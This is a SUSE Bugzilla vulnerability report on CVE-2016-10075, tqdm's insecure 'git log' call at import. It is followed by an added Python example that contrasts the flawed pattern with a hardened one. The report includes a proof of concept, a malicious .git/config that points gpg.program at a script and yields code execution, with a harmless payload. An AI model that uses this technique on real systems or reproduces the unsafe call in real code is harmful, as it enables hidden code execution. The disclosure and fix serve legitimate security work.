[Bug 1017485] New: VUL-0: CVE-2016-10075: python-tqdm,python3-tqdm: insecure use of git
http://bugzilla.suse.com/show_bug.cgi?id=1017485

            Bug ID: 1017485
           Summary: VUL-0: CVE-2016-10075: python-tqdm,python3-tqdm: insecure use of git
    Classification: openSUSE
           Product: openSUSE.org
           Version: unspecified
          Hardware: Other
               URL: https://smash.suse.de/issue/178135/
                OS: Other
            Status: NEW
          Severity: Normal
          Priority: P5 - None
         Component: 3rd party software
          Assignee: toddrme2178@gmail.com
          Reporter: astieger@suse.com
        QA Contact: opensuse-communityscreening@forge.provo.novell.com
                CC: arun@gmx.de, jmatejek@suse.com, toddrme2178@gmail.com
          Found By: Security Response Team
           Blocker: ---

When importing tqdm, the tqdm._version module executes the following
command:

  git log -n 1 --oneline

This was meant to check if the user is running a pre-release version of
tqdm. But cwd might be a part of an unrelated git repository, possibly a
malicious one. At least with git 2.10 or later, it's possible to craft a
repo in which "git log" executes arbitrary code:

$ tail -n4 /tmp/.git/config
[log]
	showSignature = true
[gpg]
	program = /tmp/moogpg
$ tail -n4 /tmp/moogpg
#!/bin/sh
exec > /dev/tty 2>&1
cowsay pwned
sleep 9999
$ cd /tmp
$ pydoc tqdm
 _______
< pwned >
 -------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||

Upstream bug report: https://github.com/tqdm/tqdm/issues/328

Affected versions: v4.4.1 and later.

devel:languages:python/python-tqdm 4.8.4
devel:languages:python3/python3-tqdm 4.10.10

References:
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-10075
http://seclists.org/oss-sec/2016/q4/775

-- 
You are receiving this mail because:
You are on the CC list for the bug.
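The report above describes the pattern (a library shelling out to "git log" from whatever directory the importing process happens to be in, so the caller's cwd and the .git/config found there decide what git runs) but not how a package would avoid it. The following is an added example written for this page; it is not tqdm's code and not the reporter's, and it does not claim to be the upstream fix. It places the flawed pattern beside a hardened version that (a) prefers a version string packaged with the module, (b) only queries git when the package's own directory is itself a checkout, (c) pins cwd to that directory, (d) overrides log.showSignature on the command line so a repository-level setting cannot make git invoke gpg.program, and (e) falls back to the packaged string on any failure. The package directory, the release string "4.10.10" and the demo() scenario are constructed for illustration.

```python
"""Version detection: the cwd-dependent pattern from the report beside a
hardened variant.  Added example, not tqdm's own code."""
import os
import subprocess
import tempfile

# Constructed: treat the directory holding this module as the package dir.
PACKAGE_DIR = (os.path.dirname(os.path.abspath(__file__))
               if "__file__" in globals() else os.getcwd())
VERSION = "4.10.10"  # constructed release string, as a package would ship it


def unsafe_git_describe():
    """The pattern described in the report: git runs in the caller's cwd, so
    an unrelated repository (and its .git/config) controls what executes.
    Kept here only to show the flaw; never call this at import time."""
    return subprocess.run(["git", "log", "-n", "1", "--oneline"],
                          capture_output=True, text=True).stdout.strip()


def git_checkout_dir(package_dir):
    """Return package_dir only if it is itself the root of a git checkout.
    The check does not walk upward, so a repository above or beside the
    package (including the user's cwd) is never considered."""
    if os.path.exists(os.path.join(package_dir, ".git")):
        return package_dir
    return None


def safe_git_command():
    """argv that neutralises the config-driven helper: ``git -c`` takes
    precedence over every config file, so log.showSignature stays off and
    gpg.program is never consulted; --no-pager keeps core.pager out too."""
    return ["git", "--no-pager", "-c", "log.showSignature=false",
            "log", "-n", "1", "--oneline"]


def detect_version(package_dir=PACKAGE_DIR, release=VERSION):
    """Return (version, source).  git is only run when the package directory
    is a checkout, with cwd pinned there; anything else yields the packaged
    release string, which is what an installed package should report."""
    checkout = git_checkout_dir(package_dir)
    if checkout is None:
        return release, "packaged"
    try:
        out = subprocess.run(safe_git_command(), cwd=checkout,
                             capture_output=True, text=True, timeout=5,
                             check=True).stdout.strip()
    except (OSError, subprocess.SubprocessError):
        # git missing, not a valid repo, or hung: fall back, never fail import
        return release, "packaged"
    return "%s+%s" % (release, out.split()[0]), "git"


def demo():
    """Constructed scenario: one plain package directory and one containing
    an empty .git directory.  The plain one must never shell out; the other
    is recognised as a checkout but, being an invalid repo, falls back."""
    with tempfile.TemporaryDirectory() as root:
        plain = os.path.join(root, "plainpkg")
        fake = os.path.join(root, "devpkg")
        os.makedirs(plain)
        os.makedirs(os.path.join(fake, ".git"))
        return {
            "plain": detect_version(plain),
            "plain_is_checkout": git_checkout_dir(plain) is not None,
            "fake_is_checkout": git_checkout_dir(fake) == fake,
            "fake": detect_version(fake),
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The decisive change is the cwd pin plus the directory check: even with the `-c` override, running git against a directory the user controls would still let that directory's configuration shape git's behaviour, so the hardened version never looks anywhere except the package's own location and treats every failure as "use the packaged version".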